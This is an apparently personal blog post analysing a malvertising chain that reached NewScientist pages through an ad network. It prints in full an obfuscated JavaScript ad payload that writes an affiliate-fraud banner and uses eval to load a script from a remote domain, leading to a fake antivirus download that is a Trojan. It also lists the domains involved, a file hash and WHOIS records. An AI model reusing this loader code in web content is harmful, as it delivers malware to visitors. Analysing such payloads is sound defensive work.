Anatomy of a Fraud

Now that I have a blog, I can document some of the malware that I come across. The impetus behind this post is a retweeted link to a NewScientist story entitled "Genome firm shoots itself in the foot."

The problem starts with the fact that the NewScientist uses ADTECH to serve banner ads via some JavaScript magic. The way the JavaScript magic works is as follows:

  1. A NewScientist web page requests JavaScript from an ADTECH server.
  2. The ADTECH server responds with a JavaScript that contains a request for another JavaScript from a 3rd party server.
  3. Periodically, "farmingtoncp.com" is the 3rd party server from which the ultimate JavaScript is requested.

The problem with "farmingtoncp.com" is that it occasionally delivers the following JavaScript:

document.write(unescape("%3Ca href='http%3A%2F%2Fjetblue.com%2F%3F%3D3468' target='_blank'%3E%3Cimg src='http://farmingtoncp.com/bdb/Jetblue/728x90_upd.jpg' border='0' %3E%3C/a%3E")); statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60); var cd1 = "ine"; var cd2 = "rsard.co"; var cd3 = "m"; var cur_domain = cd1 + cd2 + cd3; var all_t = "-10,-9,-8,-7,-6,-5,-4,-3,-1,0,1"; var mtch = all_t.match(statictml); if ( mtch == null ) { document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=191959845&s=1&e=0' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E")); } else { var abc = "http://nokian-d"; var def = "iscounts.cn/go.php?i"; var klm = "d=2006-51&key=0522c7066&d=1"; var action_URL = abc + def + klm; eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%22%25%33%43%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%22%20%2B%20%63%75%72%5F%64%6F%6D%61%69%6E%20%2B%20%22%2F%69%6E%63%6C%75%64%65%73%30%32%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%25%33%45%25%33%43%2F%73%63%72%69%70%74%25%33%45%22%29%29%3B')); } //!mtch

This JavaScript may look complex, but it is really quite simple. Its mission is two-fold. First, it sets up a banner ad for JetBlue Airways. If one clicks on the ad, the fraudsters earn a commission via JetBlue's affiliate program run by Commission Junction. The offending JetBlue URL containing the affiliate code is as follows:

http://jetblue.com/?=3468

Secondly, the JavaScript contacts a server at "inersard.com" in order to trigger a redirect to an action_URL, which, in this case, points to a server at the "nokian-discounts.cn" domain name.

From a user's perspective, all of the above happens in an instant so that the page at the NewScientist is bypassed and, in its place, one gets a scary page that declares that "your PC needs to install antimalware software! Antivir can perform fast and free scan of your computer." Unfortunately, if one downloads this antimalware software, one gets a 184,320 byte .exe file (MD5: 800dae61b734f31c9dab82cbd4135594) from "n6-scanner.com" that is really a Trojan horse known as Trojan.Agent.180224.

As you can see, these kinds of scams involve several entities, including many legitimate businesses. Such complexity makes halting Internet-based fraud almost impossible. Still, I hope that this is the last time that I have to deal with malware being delivered over an ad network.

Addendum

The (presumably fake) WHOIS information for each of the sites listed above:

Kelly Lattimore dns@farmingtoncp.com
618-329-3335 fax: 618-329-3335
273 Eagle Street
Oakdale IL 62268
us

DNS:
ns1.everydns.net
ns2.everydns.net

Created: 2009-12-02
Expires: 2010-12-02

Steve Garcia admin@inersard.com
218-597-0073 fax: 218-597-0073
1427 Terra Cotta St
Strandquist MN 56758
us

DNS:
ns1.everydns.net
ns2.everydns.net

Created: 2009-12-21
Expires: 2010-12-21

Domain Name: nokian-discounts.cn
ROID: 20091213s10001s02831682-cn
Domain Status: clientTransferProhibited
Administrative Email: jeya32jay@live.co.uk
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Name Server:ns3.everydns.net
Name Server:ns4.everydns.net
Registration Date: 2009-12-13 21:36
Expiration Date: 2010-12-13 21:36

Domain Name: n6-scanner.com
Henry Nguyen Gong contact@privacy-protect.cn
+33.0466583875 fax: +33.0466583875
Rue la produit 34
Nimes Languedoc-Roussillon 30189
fr

DNS:
ns1.everydns.net
ns2.everydns.net
ns3.everydns.net
ns4.everydns.net

Created: 2009-12-20
Expires: 2010-12-20